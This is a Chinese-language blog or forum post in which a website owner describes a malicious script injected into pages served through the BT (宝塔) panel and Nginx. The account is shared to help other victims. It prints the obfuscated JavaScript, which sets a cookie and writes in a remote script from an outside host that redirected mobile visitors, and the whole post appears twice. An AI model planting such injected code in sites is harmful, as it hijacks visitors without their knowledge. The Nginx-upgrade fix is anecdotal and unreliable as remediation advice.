干货!记一次宝塔面板查毒杀毒经历,过程很是曲折~
先放上病毒代码:------------------------------------------------
var _0xd4d9=["\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x73\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x77\x61\x66\x5F\x73\x63","\x35\x38\x38\x39\x36\x34\x37\x37\x32\x36","\x25\x33\x43\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x2E\x6D\x73\x73\x74\x61\x74\x69\x63\x2E\x6E\x65\x74\x2F\x6D\x61\x69\x6E\x33\x2F\x63\x6F\x6D\x6D\x6F\x6E\x2F\x61\x73\x73\x65\x74\x73\x2F\x74\x65\x6D\x70\x6C\x61\x74\x65\x2F\x68\x65\x61\x64\x2F\x61\x64\x2E\x74\x6D\x70\x6C\x5F\x61\x39\x62\x37\x2E\x6A\x73\x27\x25\x33\x45\x25\x33\x43\x2F\x73\x63\x72\x69\x70\x74\x25\x33\x45","\x77\x72\x69\x74\x65"];function setc(_0x64d8x2,_0x64d8x3,_0x64d8x4){var _0x64d8x5= new Date();_0x64d8x5[_0xd4d9[1]](_0x64d8x5[_0xd4d9[0]]()+ _0x64d8x4);document[_0xd4d9[2]]= _0x64d8x2+ _0xd4d9[3]+ _0x64d8x3+ _0xd4d9[4]+ _0x64d8x5[_0xd4d9[5]]()}setc(_0xd4d9[6],_0xd4d9[7],360);document[_0xd4d9[9]](unescape(_0xd4d9[8]));-------------------------------------------------------
不知道有没有人和我有相同遭遇.
此js会显示在页面源码上方,并且经过加密的.
第一次见到这个病毒是在去年,那时候刚做的一个站, 刚有点流量,正兴奋呢. 某次用手机打开网站的时候,就自动打开了一个新窗口,跳到了一个s站.
我再次进入,没有再次跳转.
清理缓存,换ip ,再次跳转
当时太晚,没深入研究,第二天再查站的时候,没有跳转,还以为事情过去了
过几天再查的时候,再次跳转
于是总结出规律: 该病毒,识别手机访问, 且 首次 访问 就跳转, 并且后台可以自定义时间段. 一般是在半夜,白天不跳.
很是狡猾,一般人网站中毒了还真看不出来.
于是按照常规思路,抓包找病毒源. 翻遍了整个源码,找不到....
找各大佬询问, 没有结果
在某个飞机群,看到有人相似遭遇,该群主也正在全力找病毒源头. 给了他宝塔信息.等了几天没有结果
这几天时间内,重装系统,重装程序数次,每次刚高兴一会,以为病毒解决了, 但是过一会,再次跳转
那群主找到了病毒藏匿的源头, 在Nginx 一个配置目录里,可以手动删除,但是过一段时间,病毒会再生. 也没有进一步信息
于是网站放弃!!!
完~
(吃瓜群众: 你这被病毒打败了, 你都放弃了,还写个求的经历~~~~)
-------------------------------------
事情继续:
今年再搞一个网站的时候,无聊中查看网页源码, 遂即冷汗直流, 那熟悉的,该死的代码又出现了. 这咋整,这咋办!!!
于是网上搜索信息,心想着,这几个月过去了,应该有人有解决办法了吧,于是搜到了这一篇文章
<宝塔面板 2022 年 12 月高危安全漏洞事件详细记录>
本以为有救了, 结果作者经过缜密的分析,详细的摸排,最后给出的解决办法,是不用宝塔,用别的程序.额....
没办法.我肯定不能换,因为习惯了. 后来想想,搜搜, 感觉有些线索指向到了Nginx有漏洞, 于是我直接把Nginx升级到最新版本.我死马当活马医, 能行就行,不行拉倒吧,结果大块人心, 解决了.
特此写贴分享, 希望能够帮助到大家
完~
var _0xd4d9=["\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x73\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x77\x61\x66\x5F\x73\x63","\x35\x38\x38\x39\x36\x34\x37\x37\x32\x36","\x25\x33\x43\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x2E\x6D\x73\x73\x74\x61\x74\x69\x63\x2E\x6E\x65\x74\x2F\x6D\x61\x69\x6E\x33\x2F\x63\x6F\x6D\x6D\x6F\x6E\x2F\x61\x73\x73\x65\x74\x73\x2F\x74\x65\x6D\x70\x6C\x61\x74\x65\x2F\x68\x65\x61\x64\x2F\x61\x64\x2E\x74\x6D\x70\x6C\x5F\x61\x39\x62\x37\x2E\x6A\x73\x27\x25\x33\x45\x25\x33\x43\x2F\x73\x63\x72\x69\x70\x74\x25\x33\x45","\x77\x72\x69\x74\x65"];function setc(_0x64d8x2,_0x64d8x3,_0x64d8x4){var _0x64d8x5= new Date();_0x64d8x5[_0xd4d9[1]](_0x64d8x5[_0xd4d9[0]]()+ _0x64d8x4);document[_0xd4d9[2]]= _0x64d8x2+ _0xd4d9[3]+ _0x64d8x3+ _0xd4d9[4]+ _0x64d8x5[_0xd4d9[5]]()}setc(_0xd4d9[6],_0xd4d9[7],360);document[_0xd4d9[9]](unescape(_0xd4d9[8]));-------------------------------------------------------
不知道有没有人和我有相同遭遇.
此js会显示在页面源码上方,并且经过加密的.
第一次见到这个病毒是在去年,那时候刚做的一个站, 刚有点流量,正兴奋呢. 某次用手机打开网站的时候,就自动打开了一个新窗口,跳到了一个s站.
我再次进入,没有再次跳转.
清理缓存,换ip ,再次跳转
当时太晚,没深入研究,第二天再查站的时候,没有跳转,还以为事情过去了
过几天再查的时候,再次跳转
于是总结出规律: 该病毒,识别手机访问, 且 首次 访问 就跳转, 并且后台可以自定义时间段. 一般是在半夜,白天不跳.
很是狡猾,一般人网站中毒了还真看不出来.
于是按照常规思路,抓包找病毒源. 翻遍了整个源码,找不到....
找各大佬询问, 没有结果
在某个飞机群,看到有人相似遭遇,该群主也正在全力找病毒源头. 给了他宝塔信息.等了几天没有结果
这几天时间内,重装系统,重装程序数次,每次刚高兴一会,以为病毒解决了, 但是过一会,再次跳转
那群主找到了病毒藏匿的源头, 在Nginx 一个配置目录里,可以手动删除,但是过一段时间,病毒会再生. 也没有进一步信息
于是网站放弃!!!
完~
(吃瓜群众: 你这被病毒打败了, 你都放弃了,还写个求的经历~~~~)
-------------------------------------
事情继续:
今年再搞一个网站的时候,无聊中查看网页源码, 遂即冷汗直流, 那熟悉的,该死的代码又出现了. 这咋整,这咋办!!!
于是网上搜索信息,心想着,这几个月过去了,应该有人有解决办法了吧,于是搜到了这一篇文章
<宝塔面板 2022 年 12 月高危安全漏洞事件详细记录>
本以为有救了, 结果作者经过缜密的分析,详细的摸排,最后给出的解决办法,是不用宝塔,用别的程序.额....
没办法.我肯定不能换,因为习惯了. 后来想想,搜搜, 感觉有些线索指向到了Nginx有漏洞, 于是我直接把Nginx升级到最新版本.我死马当活马医, 能行就行,不行拉倒吧,结果大块人心, 解决了.
特此写贴分享, 希望能够帮助到大家
完~